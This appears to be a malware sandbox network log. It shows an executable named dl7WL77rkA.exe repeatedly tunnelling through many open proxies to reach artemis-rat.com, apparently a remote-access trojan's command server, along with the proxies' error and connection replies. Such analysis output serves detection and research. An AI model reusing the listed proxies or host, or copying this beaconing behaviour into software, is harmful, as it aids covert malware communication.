                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1300192.168.2.55351440.76.160.14390023876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:43.300955057 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1301192.168.2.55350593.171.220.22988883876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:43.302968025 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:43.701910019 CET327INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                            Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:43 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                            Content-Length: 166
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1302192.168.2.551687147.12.46.6231283876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:43.306176901 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:43.641019106 CET1254INHTTP/1.1 403 Forbidden
                                                                                                                                                                                                                                                            Server: squid/3.5.28
                                                                                                                                                                                                                                                            Mime-Version: 1.0
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:43 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html;charset=utf-8
                                                                                                                                                                                                                                                            Content-Length: 952
                                                                                                                                                                                                                                                            X-Squid-Error: ERR_ACCESS_DENIED 0
                                                                                                                                                                                                                                                            Content-Language: en
                                                                                                                                                                                                                                                            X-Cache: MISS from ah_test
                                                                                                                                                                                                                                                            Via: 1.1 ah_test (squid/3.5.28)
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 74 79 70 65 3d 22 63 6f 70 79 72 69 67 68 74 22 20 63 6f 6e 74 65 6e 74 3d 22 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 31 38 20 54 68 65 20 41 65 72 6f 68 69 76 65 22 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 74 69 74 6c 65 3e 45 52 52 4f 52 3a 20 57 65 62 20 50 61 67 65 20 42 6c 6f 63 6b 65 64 3c 2f 74 69 74 6c 65 3e 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 3c 21 2d 2d 0a 20 0a 0a 62 6f 64 79 0a 3a 6c 61 6e 67 28 66 61 29 20 7b 20 64 69 72 65 63 74 69 6f 6e 3a 20 72 74 6c 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 30 30 25 3b 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 54 61 68 6f 6d 61 2c 20 52 6f 79 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 66 6c 6f 61 74 3a 20 72 69 67 68 74 3b 20 7d 0a 3a 6c 61 6e 67 28 68 65 29 20 7b 20 64 69 72 65 63 74 69 6f 6e 3a 20 72 74 6c 3b 20 7d 0a 20 2d 2d 3e 3c 2f 73 74 79 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 20 69 64 3d 22 45 52 52 5f 41 43 43 45 53 53 5f 44 45 4e 49 45 44 22 3e 0a 3c 64 69 76 20 69 64 3d 22 74 69 74 6c 65 73 22 3e 0a 3c 68 31 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 35 62 38 63 62 64 3b 22 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 63 61 6e 6e 6f 74 20 62 65 20 72 65 74 72 69 65 76 65 64 3c 2f 68 31 3e 0a 3c 2f 64 69 76 3e 0a 0a 3c 64 69 76 20 69 64 3d 22 63 6f 6e 74 65 6e 74 22 3e 0a 3c 70 3e 41 63 63 65 73 73 20 74 6f 20 74 68 65 20 77 65 62 20 70 61 67 65 20 68 61 73 20 62 65 65 6e 20 62 6c 6f 63 6b 65 64 20 69 6e 20 61 63 63 6f 72 64 61 6e 63 65 20 77 69 74 68 20 74 68 65 20 6e 65 74 77 6f 72 6b 20 70 6f 6c 69 63 79 2e 20 49 66 20 79 6f 75 20 62 65 6c 69 65 76 65 20 74 68 69 73 20 69 73 20 61 6e 20 65 72 72 6f 72 2c 20 70 6c 65 61 73 65 20 63 6f 6e 74 61 63 74 20 79 6f 75 20 73 79 73 74 65 6d 20 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 2e 3c 2f 70 3e 0a 3c 70 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 37 31 39 32 62 34 3b 22 3e 55 52 4c 3a 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 61 72 74 65 6d 69 73 2d 72 61 74 2e 63 6f 6d 2f 2a 22 3e 68 74 74 70 73 3a 2f 2f 61 72 74 65 6d 69 73 2d 72 61 74 2e 63 6f 6d 2f 2a 3c 2f 61 3e 3c 2f 70 3e 0a 3c 70 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 37 31 39 32 62 34 3b 22 3e 43 61 74 65 67 6f 72 79 3a 20 3c 2f 70 3e 0a 3c 62 72 3e 0a 3c 2f 64 69 76 3e 0a 0a 3c 64 69 76 20 69 64 3d 22 66 6f 6f 74 65 72 22 3e 0a 3c 70 20 73 74 79 6c 65 3d 22 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 32 70 78 3b 22 3e 47 65 6e 65 72 61 74 65 64 20 4d 6f 6e 2c 20 31 31 20 4d 61 72 20 32 30 32 34 20 30 32 3a 33 30 3a 34 33 20 47 4d 54 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                                                                                                                                                            Data Ascii: <html><head><meta type="copyright" content="Copyright (C) 1996-2018 The Aerohive"><meta http-equiv="Content-Type" content="text/html; charset=utf-8"><title>ERROR: Web Page Blocked</title><style type="text/css">... body:lang(fa) { direction: rtl; font-size: 100%; font-family: Tahoma, Roya, sans-serif; float: right; }:lang(he) { direction: rtl; } --></style></head><body id="ERR_ACCESS_DENIED"><div id="titles"><h1 style="color: #5b8cbd;">The requested URL cannot be retrieved</h1></div><div id="content"><p>Access to the web page has been blocked in accordance with the network policy. If you believe this is an error, please contact you system administrator.</p><p style="color: #7192b4;">URL: <a href="https://artemis-rat.com/*">https://artemis-rat.com/*</a></p><p style="color: #7192b4;">Category: </p><br></div><div id="footer"><p style="font-size: 12px;">Generated Mon, 11 Mar 2024 02:30:43 GMT</p></div></body></html>


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1303192.168.2.553512211.222.252.18781933876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:43.315706015 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1304192.168.2.55185692.204.135.37634623876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:43.317779064 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:46.405078888 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:49.405577898 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:55.405154943 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1305192.168.2.553066107.180.90.42106703876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:43.322479010 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:46.405095100 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:49.407181978 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1306192.168.2.553513111.90.150.10910803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:43.408189058 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1307192.168.2.553507103.7.52.6081183876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:43.408688068 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:43.758476019 CET263INHTTP/1.1 404 No such domain
                                                                                                                                                                                                                                                            Content-Length: 6720
                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:31 GMT
                                                                                                                                                                                                                                                            Last-Modified: Wed, 08 Jun 1955 12:00:00 GMT
                                                                                                                                                                                                                                                            Expires: Sat, 17 Jun 2000 12:00:00 GMT
                                                                                                                                                                                                                                                            Pragma: no-cache
                                                                                                                                                                                                                                                            Connection: close


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1308192.168.2.55350674.118.80.24431283876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:43.411818027 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1309192.168.2.552931140.227.204.7031283876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:43.412322998 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:43.757299900 CET39INHTTP/1.1 200 Connection established


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1310192.168.2.553092192.169.226.96316403876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:43.412409067 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:46.592319012 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:49.594938993 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:55.701932907 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1311192.168.2.5535201.15.62.1256783876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:43.412827015 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1312192.168.2.551953189.240.60.16890903876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:43.413047075 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:43.685081959 CET72INHTTP/1.1 200 Connection established
                                                                                                                                                                                                                                                            Proxy-Agent: Fortinet-Proxy/1.0


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1313192.168.2.55304745.65.137.2189993876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:43.413360119 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:46.592339039 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:49.594937086 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:49.920937061 CET19INHTTP/1.1 200 OK


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1314192.168.2.55210547.254.90.12588883876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:43.413516998 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1315192.168.2.55352143.131.245.216156733876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:43.414113045 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1316192.168.2.553536173.249.33.122648733876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:43.416575909 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:44.092611074 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:45.092905998 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:47.092874050 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:50.889549017 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:54.702008009 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:58.405179024 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1317192.168.2.552920125.141.133.4755663876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:43.416896105 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:46.592334986 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:31:55.443736076 CET755INHTTP/1.0 501 Tor is not an HTTP Proxy
                                                                                                                                                                                                                                                            Content-Type: text/html; charset=iso-8859-1
